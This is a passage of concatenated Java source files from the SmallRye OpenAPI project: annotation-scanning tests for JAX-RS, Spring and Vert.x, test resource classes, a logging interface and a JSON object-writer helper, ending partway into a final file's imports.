* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.smallrye.openapi.tck.extra;
import static org.hamcrest.Matchers.equalTo;
import org.eclipse.microprofile.openapi.tck.AppTestBase;
import org.jboss.arquillian.container.test.api.Deployment;
import org.jboss.arquillian.container.test.api.RunAsClient;
import org.jboss.shrinkwrap.api.ShrinkWrap;
import org.jboss.shrinkwrap.api.spec.WebArchive;
import org.testng.annotations.Test;
import io.restassured.response.ValidatableResponse;
import test.io.smallrye.openapi.tck.ExtraSuiteTestBase;
/**
* NOTE: It's not a TCK test, it only leverages the TCK test setup
*
* @author <NAME>, <EMAIL>
* <br>
* Date: 4/19/18
*/
public class ComplexResourceTest extends ExtraSuiteTestBase<ComplexResourceTest.ComplexResourceTestArquillian> {
public static class ComplexResourceTestArquillian extends AppTestBase {
@Deployment(name = "complexTypes")
public static WebArchive createDeployment() {
return ShrinkWrap.create(WebArchive.class, "airlines.war")
.addPackages(true, new String[] { "io.smallrye.openapi.tck.extra.complex" })
.addAsManifestResource("openapi.yaml", "openapi.yaml");
}
@RunAsClient
@Test(dataProvider = "formatProvider")
public void testArray(String type) {
ValidatableResponse vr = this.callEndpoint(type);
String arraySchema = "paths.'/complex/array'.post.requestBody.content.'application/json'.schema";
vr.body(arraySchema + ".type", equalTo("array"));
vr.body(arraySchema + ".items.format", equalTo("int32"));
vr.body(arraySchema + ".items.type", equalTo("integer"));
}
@RunAsClient
@Test(dataProvider = "formatProvider")
public void testList(String type) {
ValidatableResponse vr = this.callEndpoint(type);
String arraySchema = "paths.'/complex/list'.post.requestBody.content.'application/json'.schema";
vr.body(arraySchema + ".type", equalTo("array"));
vr.body(arraySchema + ".items.format", equalTo("int32"));
vr.body(arraySchema + ".items.type", equalTo("integer"));
}
}
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/dataobject/BeanValidationResourceTest.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner.dataobject;
import java.io.IOException;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.jandex.Index;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
import io.smallrye.openapi.runtime.scanner.IndexScannerTestBase;
import io.smallrye.openapi.runtime.scanner.OpenApiAnnotationScanner;
/**
* @author <NAME> {@literal <<EMAIL>>}
*/
class BeanValidationResourceTest extends IndexScannerTestBase {
@Test
void testJavaxBeanValidationDocument() throws IOException, JSONException {
Index index = indexOf(test.io.smallrye.openapi.runtime.scanner.dataobject.BVTestResource.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.BVTestResourceEntity.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.BVTestContainer.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.TestEnum.class);
testBeanValidationDocument(index);
}
@Test
void testJakartaBeanValidationDocument() throws IOException, JSONException {
Index index = indexOf(test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta.BVTestResource.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta.BVTestResourceEntity.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta.BVTestContainer.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.TestEnum.class);
testBeanValidationDocument(index);
}
void testBeanValidationDocument(Index index) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), index);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("dataobject/resource.testBeanValidationDocument.json", result);
}
@Test
void testJavaxInheritedBVConstraints() throws IOException, JSONException {
Index index = indexOf(test.io.smallrye.openapi.runtime.scanner.dataobject.User.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.BaseUser.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.UserImpl.class);
testInheritedBVConstraints(index);
}
@Test
void testJakartaInheritedBVConstraints() throws IOException, JSONException {
Index index = indexOf(test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta.User.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta.BaseUser.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta.UserImpl.class);
testInheritedBVConstraints(index);
}
void testInheritedBVConstraints(Index index) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), index);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("dataobject/schema.inherited-bv-constraints.json", result);
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/BaseUser.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import javax.validation.constraints.Min;
import javax.validation.constraints.NotNull;
public abstract class BaseUser {
@Min(value = 10)
@NotNull
protected Integer id;
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/runtime/io/IoLogging.java<|end_filename|>
package io.smallrye.openapi.runtime.io;
import org.jboss.jandex.Type;
import org.jboss.logging.BasicLogger;
import org.jboss.logging.Logger;
import org.jboss.logging.annotations.Cause;
import org.jboss.logging.annotations.LogMessage;
import org.jboss.logging.annotations.Message;
import org.jboss.logging.annotations.MessageLogger;
@MessageLogger(projectCode = "SROAP", length = 5)
public interface IoLogging extends BasicLogger {
IoLogging logger = Logger.getMessageLogger(IoLogging.class, IoLogging.class.getPackage().getName());
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2000, value = "Processing a map of %s annotations.")
void annotationsMap(String annotation);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2001, value = "Processing a json map of %s nodes.")
void jsonNodeMap(String node);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2002, value = "Processing a list of %s annotations.")
void annotationsList(String annotation);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2003, value = "Processing a json list of %s.")
void jsonList(String of);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2004, value = "Processing a single %s annotation.")
void singleAnnotation(String annotation);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2005, value = "Processing an %s annotation.")
void annotation(String annotation);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2006, value = "Processing a single %s annotation as a %s.")
void singleAnnotationAs(String annotation, String as);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2007, value = "Processing a single %s json node.")
void singleJsonNode(String node);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2008, value = "Processing an %s json node.")
void jsonNode(String node);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2009, value = "Processing a single %s json object.")
void singleJsonObject(String node);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2010, value = "Processing a json map of %s.")
void jsonMap(String node);
@LogMessage(level = Logger.Level.ERROR)
@Message(id = 2011, value = "Error reading a CallbackOperation annotation.")
void readingCallbackOperation(@Cause Throwable cause);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2012, value = "Processing a list of %s annotations into an %s.")
void annotationsListInto(String annotation, String into);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2013, value = "Processing an enum %s")
void enumProcessing(Type type);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2014, value = "Processing an array of %s annotations.")
void annotationsArray(String annotation);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2015, value = "Processing a json array of %s json nodes.")
void jsonArray(String of);
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ResteasyMultipartInputTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.Consumes;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import org.jboss.resteasy.plugins.providers.multipart.MultipartInput;
@Path(value = "multipart-mixed")
public class ResteasyMultipartInputTestResource {
@POST
@Path(value = "post")
@Consumes(value = "multipart/mixed")
@SuppressWarnings(value = "unused")
public void post(MultipartInput input) {
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/resources/TagTestResource2.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.resources;
import javax.ws.rs.Consumes;
import javax.ws.rs.GET;
import javax.ws.rs.PATCH;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
import org.eclipse.microprofile.openapi.annotations.ExternalDocumentation;
import org.eclipse.microprofile.openapi.annotations.tags.Tag;
import org.eclipse.microprofile.openapi.annotations.tags.Tags;
@Path("/tags2")
@Tag(description = "This tag will not appear without a name")
@Tag(name = "tag1", description = "TAG1 from TagTestResource2")
@Tag(ref = "http://example/com/tag2")
@SuppressWarnings("unused")
public class TagTestResource2 {
@GET
@Produces(MediaType.TEXT_PLAIN)
@Tag(name = "tag3", description = "TAG3 from TagTestResource2#getValue1", externalDocs = @ExternalDocumentation(description = "Ext doc from TagTestResource2#getValue1"))
String getValue1() {
return null;
}
@POST
@Consumes(MediaType.TEXT_PLAIN)
void postValue(String value) {
}
@PATCH
@Consumes(MediaType.TEXT_PLAIN)
@Tags({
@Tag, @Tag
})
void patchValue(String value) {
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/RolesDeclaredResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.annotation.security.DeclareRoles;
import javax.annotation.security.RolesAllowed;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.core.Response;
@Path(value = "/v1")
@SuppressWarnings(value = "unused")
@DeclareRoles(value = { "admin", "users" })
public class RolesDeclaredResource {
@GET
@Path(value = "secured")
@Produces(value = "application/json")
@RolesAllowed(value = { "admin" })
public Response getSecuredData(int id) {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/Seed.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
public class Seed {
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/BeanParamAddon.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.ws.rs.HeaderParam;
public interface BeanParamAddon {
@HeaderParam(value = "hi1")
void setHeaderParam1(String value);
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/PathParamTemplateRegexTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.ws.rs.GET;
import jakarta.ws.rs.Path;
import jakarta.ws.rs.PathParam;
import jakarta.ws.rs.Produces;
import jakarta.ws.rs.core.MediaType;
@Path(value = "/template")
public class PathParamTemplateRegexTestResource {
@GET
@Path(value = "{id:\\d+}/{name: [A-Z]+ }/{ nickname :[a-zA-Z]+}/{age: [0-9]{1,3}}")
@Produces(value = MediaType.TEXT_PLAIN)
public String echo(@PathParam(value = "id") Integer id, @PathParam(value = "name") String name,
@PathParam(value = "nickname") String nickname, @PathParam(value = "age") String age) {
return String.valueOf(id) + ' ' + name + ' ' + nickname + ' ' + age;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ResteasyMultipartFormDataMapTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import java.util.Map;
import javax.ws.rs.Consumes;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.core.MediaType;
@Path(value = "multipart-form-data-map")
public class ResteasyMultipartFormDataMapTestResource {
@POST
@Path(value = "post")
@Consumes(value = MediaType.MULTIPART_FORM_DATA)
@SuppressWarnings(value = "unused")
public void post(Map<String, RequestBodyWidget> input) {
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/Sub2TestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
@SuppressWarnings(value = "unused")
public class Sub2TestResource<T> {
@GET
@Path(value = "{subsubid}")
public T getSub2(@PathParam(value = "subsubid") String subsubid) {
return null;
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/runtime/io/ObjectWriter.java<|end_filename|>
package io.smallrye.openapi.runtime.io;
import java.math.BigDecimal;
import java.math.BigInteger;
import java.util.List;
import java.util.Map;
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.node.ArrayNode;
import com.fasterxml.jackson.databind.node.ObjectNode;
public class ObjectWriter {
private ObjectWriter() {
}
/**
* Writes an array of strings to the parent node.
*
* @param parent the parent json node
* @param models list of Strings
* @param propertyName the name of the node
*/
public static void writeStringArray(ObjectNode parent, List<String> models, String propertyName) {
if (models == null) {
return;
}
ArrayNode node = parent.putArray(propertyName);
for (String model : models) {
node.add(model);
}
}
/**
* Writes an array of objects to the parent node.
*
* @param parent the parent json node
* @param models list of objects
* @param propertyName the name of the node
*/
public static void writeObjectArray(ObjectNode parent, List<Object> models, String propertyName) {
if (models == null) {
return;
}
ArrayNode node = parent.putArray(propertyName);
for (Object model : models) {
addObject(node, model);
}
}
/**
* Writes a map of strings to the parent node.
*
* @param parent the parent json node
* @param models map of strings
* @param propertyName name of the node
*/
public static void writeStringMap(ObjectNode parent, Map<String, String> models, String propertyName) {
if (models == null) {
return;
}
ObjectNode node = parent.putObject(propertyName);
for (Map.Entry<String, String> entry : models.entrySet()) {
node.put(entry.getKey(), entry.getValue());
}
}
/**
* Write an object to json
*
* @param node the json node
* @param key key
* @param value value
*/
public static void writeObject(ObjectNode node, String key, Object value) {
if (value == null) {
return;
}
if (value instanceof String) {
node.put(key, (String) value);
} else if (value instanceof JsonNode) {
node.set(key, (JsonNode) value);
} else if (value instanceof BigDecimal) {
node.put(key, (BigDecimal) value);
} else if (value instanceof BigInteger) {
node.put(key, new BigDecimal((BigInteger) value));
} else if (value instanceof Boolean) {
node.put(key, (Boolean) value);
} else if (value instanceof Double) {
node.put(key, (Double) value);
} else if (value instanceof Float) {
node.put(key, (Float) value);
} else if (value instanceof Integer) {
node.put(key, (Integer) value);
} else if (value instanceof Long) {
node.put(key, (Long) value);
} else if (value instanceof List) {
ArrayNode array = node.putArray(key);
for (Object valueItem : List.class.cast(value)) {
addObject(array, valueItem);
}
} else if (value instanceof Map) {
ObjectNode objNode = node.putObject(key);
@SuppressWarnings("unchecked")
Map<String, Object> values = (Map<String, Object>) value;
for (Map.Entry<String, Object> entry : values.entrySet()) {
String propertyName = entry.getKey();
writeObject(objNode, propertyName, entry.getValue());
}
} else {
node.put(key, (String) null);
}
}
private static void addObject(ArrayNode node, Object value) {
if (value instanceof String) {
node.add((String) value);
} else if (value instanceof JsonNode) {
node.add((JsonNode) value);
} else if (value instanceof BigDecimal) {
node.add((BigDecimal) value);
} else if (value instanceof BigInteger) {
node.add(new BigDecimal((BigInteger) value));
} else if (value instanceof Boolean) {
node.add((Boolean) value);
} else if (value instanceof Double) {
node.add((Double) value);
} else if (value instanceof Float) {
node.add((Float) value);
} else if (value instanceof Integer) {
node.add((Integer) value);
} else if (value instanceof Long) {
node.add((Long) value);
} else if (value instanceof List) {
ArrayNode array = node.addArray();
for (Object valueItem : List.class.cast(value)) {
addObject(array, valueItem);
}
} else if (value instanceof Map) {
ObjectNode objNode = node.addObject();
@SuppressWarnings("unchecked")
Map<String, Object> values = (Map<String, Object>) value;
for (Map.Entry<String, Object> entry : values.entrySet()) {
String propertyName = entry.getKey();
writeObject(objNode, propertyName, entry.getValue());
}
} else {
node.add((String) null);
}
}
}
<|start_filename|>extension-vertx/src/test/java/io/smallrye/openapi/runtime/scanner/VertxAnnotationScannerTest.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.jandex.Index;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
import test.io.smallrye.openapi.runtime.scanner.entities.Greeting;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingDeleteRoute;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingGetRoute;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingPostRoute;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingPutRoute;
/**
* Basic Vert.x annotation scanning
*
* @author <NAME> (<EMAIL>)
*/
class VertxAnnotationScannerTest extends VertxDataObjectScannerTestBase {
/**
* This test a basic, no OpenApi annotations, hello world service
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicGetRouteDefinitionScanning() throws IOException, JSONException {
Index i = indexOf(GreetingGetRoute.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicRouteGetDefinitionScanning.json", result);
}
/**
* This test a basic, no OpenApi annotations, hello world service
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicPostRouteDefinitionScanning() throws IOException, JSONException {
Index i = indexOf(GreetingPostRoute.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicRoutePostDefinitionScanning.json", result);
}
/**
* This test a basic, no OpenApi annotations, hello world service
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicPutRouteDefinitionScanning() throws IOException, JSONException {
Index i = indexOf(GreetingPutRoute.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicRoutePutDefinitionScanning.json", result);
}
/**
* This test a basic, no OpenApi annotations, hello world service
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicDeleteRouteDefinitionScanning() throws IOException, JSONException {
Index i = indexOf(GreetingDeleteRoute.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicRouteDeleteDefinitionScanning.json", result);
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/Reptile.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
public interface Reptile {
@Schema(name = "scaleColor", description = "The color of a reptile's scales")
public String getScaleColor();
@Schema(name = "scaleColor", description = "This is how the color is set, but the description comes from getScaleColor")
public void setScaleColor(String color);
}
<|start_filename|>ui/open-api-ui/src/main/java/io/smallrye/openapi/ui/DocExpansion.java<|end_filename|>
package io.smallrye.openapi.ui;
/**
* Controls the default expansion setting for the operations and tags.
* It can be 'list' (expands only the tags), 'full' (expands the tags and operations) or 'none' (expands nothing).
*
* @author <NAME> (<EMAIL>)
*/
public enum DocExpansion {
list,
full,
none
}
<|start_filename|>extension-spring/src/test/java/io/smallrye/openapi/runtime/scanner/SpringAnnotationScannerTest.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.jandex.Index;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
import test.io.smallrye.openapi.runtime.scanner.entities.Greeting;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingDeleteController;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingDeleteControllerAlt;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingGetController;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingGetControllerAlt;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingGetControllerAlt2;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingPostController;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingPostControllerAlt;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingPutController;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingPutControllerAlt;
/**
* Basic Spring annotation scanning
*
* @author <NAME> (<EMAIL>)
*/
class SpringAnnotationScannerTest extends SpringDataObjectScannerTestBase {
/**
* This test a basic, no OpenApi annotations, hello world service
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicGetSpringDefinitionScanning() throws IOException, JSONException {
Index i = indexOf(GreetingGetController.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicSpringGetDefinitionScanning.json", result);
}
/**
* This test a basic, no OpenApi annotations, hello world service
*
* Here we use the alternative RequestMapping rather than GetMapping
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicSpringDefinitionScanningAlt() throws IOException, JSONException {
Index i = indexOf(GreetingGetControllerAlt.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicSpringGetDefinitionScanning.json", result);
}
/**
* This test a basic, no OpenApi annotations, hello world service
*
* Here we use the alternative RequestMapping plus path rather than value
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicSpringDefinitionScanningAlt2() throws IOException, JSONException {
Index i = indexOf(GreetingGetControllerAlt2.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicSpringGetDefinitionScanning.json", result);
}
/**
* This test a basic, no OpenApi annotations, hello world service
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicPostSpringDefinitionScanning() throws IOException, JSONException {
Index i = indexOf(GreetingPostController.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicSpringPostDefinitionScanning.json", result);
}
/**
* This test a basic, no OpenApi annotations, hello world service
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicPostSpringDefinitionScanningAlt() throws IOException, JSONException {
Index i = indexOf(GreetingPostControllerAlt.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicSpringPostDefinitionScanning.json", result);
}
/**
* This test a basic, no OpenApi annotations, hello world service
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicPutSpringDefinitionScanning() throws IOException, JSONException {
Index i = indexOf(GreetingPutController.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicSpringPutDefinitionScanning.json", result);
}
/**
* This test a basic, no OpenApi annotations, hello world service
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicPutSpringDefinitionScanningAlt() throws IOException, JSONException {
Index i = indexOf(GreetingPutControllerAlt.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicSpringPutDefinitionScanning.json", result);
}
/**
* This test a basic, no OpenApi annotations, hello world service
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicDeleteSpringDefinitionScanning() throws IOException, JSONException {
Index i = indexOf(GreetingDeleteController.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicSpringDeleteDefinitionScanning.json", result);
}
/**
* This test a basic, no OpenApi annotations, hello world service
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicDeleteSpringDefinitionScanningAlt() throws IOException, JSONException {
Index i = indexOf(GreetingDeleteControllerAlt.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicSpringDeleteDefinitionScanning.json", result);
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ResultList.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import java.util.List;
public class ResultList<T extends BaseModel> {
private List<T> result;
private Message error;
private Integer status;
public List<T> getResult() {
return result;
}
public Message getError() {
return error;
}
public Integer getStatus() {
return status;
}
public static class ResultBuilder<T extends BaseModel> {
private Integer status;
private Message error = new Message();
private List<T> result;
public ResultList.ResultBuilder<T> status(Integer status) {
this.status = status;
return this;
}
public ResultList.ResultBuilder<T> error(String message) {
this.error = new Message(message);
return this;
}
public ResultList.ResultBuilder<T> error(String message, String description) {
this.error = new Message(message, description);
return this;
}
public ResultList.ResultBuilder<T> result(List<T> result) {
this.result = result;
return this;
}
public ResultList<T> build() {
ResultList<T> response = new ResultList<T>();
response.status = this.status;
response.error = this.error;
response.result = this.result;
return response;
}
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/MultipartFormVerify.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.FormParam;
public class MultipartFormVerify {
@FormParam(value = "token")
public String token;
@FormParam(value = "os")
public String os;
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/NestedSchemaReferenceTests.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import java.util.HashMap;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.eclipse.microprofile.openapi.models.media.Schema;
import org.jboss.jandex.ClassType;
import org.jboss.jandex.DotName;
import org.jboss.jandex.Index;
import org.jboss.jandex.IndexView;
import org.jboss.jandex.Indexer;
import org.jboss.jandex.Type;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
/**
* @author <NAME> {@literal <<EMAIL>>}
*/
class NestedSchemaReferenceTests extends JaxRsDataObjectScannerTestBase {
@Test
void testNestedSchemasAddedToRegistry() throws IOException, JSONException {
DotName parentName = componentize(test.io.smallrye.openapi.runtime.scanner.entities.NestedSchemaParent.class.getName());
Type parentType = ClassType.create(parentName, Type.Kind.CLASS);
OpenAPI oai = context.getOpenApi();
SchemaRegistry registry = SchemaRegistry.newInstance(context);
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context, parentType);
Schema result = scanner.process();
registry.register(parentType, result);
printToConsole(oai);
assertJsonEquals("refsEnabled.nested.schema.family.expected.json", oai);
}
@Test
void testJavaxNestedSchemaOnParameter() throws IOException, JSONException {
IndexView i = indexOf(test.io.smallrye.openapi.runtime.scanner.resources.NestedSchemaOnParameterResource.class,
test.io.smallrye.openapi.runtime.scanner.resources.NestedSchemaOnParameterResource.NestedParameterTestParent.class,
test.io.smallrye.openapi.runtime.scanner.resources.NestedSchemaOnParameterResource.NestedParameterTestChild.class,
test.io.smallrye.openapi.runtime.scanner.resources.NestedSchemaOnParameterResource.AnotherNestedChildWithSchemaName.class);
testNestedSchemaOnParameter(i);
}
@Test
void testJakartaNestedSchemaOnParameter() throws IOException, JSONException {
IndexView i = indexOf(test.io.smallrye.openapi.runtime.scanner.resources.jakarta.NestedSchemaOnParameterResource.class,
test.io.smallrye.openapi.runtime.scanner.resources.jakarta.NestedSchemaOnParameterResource.NestedParameterTestParent.class,
test.io.smallrye.openapi.runtime.scanner.resources.jakarta.NestedSchemaOnParameterResource.NestedParameterTestChild.class,
test.io.smallrye.openapi.runtime.scanner.resources.jakarta.NestedSchemaOnParameterResource.AnotherNestedChildWithSchemaName.class);
testNestedSchemaOnParameter(i);
}
void testNestedSchemaOnParameter(IndexView i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(dynamicConfig(new HashMap<String, Object>()), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("refsEnabled.resource.testNestedSchemaOnParameter.json", result);
}
/*
* Test cast derived from original example in Smallrye OpenAPI issue #73.
*
* https://github.com/smallrye/smallrye-open-api/issues/73
*
*/
@Test
void testJavaxSimpleNestedSchemaOnParameter() throws IOException, JSONException {
Indexer indexer = new Indexer();
// Test samples
index(indexer, "test/io/smallrye/openapi/runtime/scanner/resources/FooResource.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/resources/FooResource$Foo.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/resources/FooResource$Bar.class");
testSimpleNestedSchemaOnParameter(indexer.complete());
}
@Test
void testJakartaSimpleNestedSchemaOnParameter() throws IOException, JSONException {
Indexer indexer = new Indexer();
// Test samples
index(indexer, "test/io/smallrye/openapi/runtime/scanner/resources/jakarta/FooResource.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/resources/jakarta/FooResource$Foo.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/resources/jakarta/FooResource$Bar.class");
testSimpleNestedSchemaOnParameter(indexer.complete());
}
void testSimpleNestedSchemaOnParameter(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(dynamicConfig(new HashMap<String, Object>()),
i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("refsEnabled.resource.simple.expected.json", result);
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/IntegerStringUUIDResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import java.util.UUID;
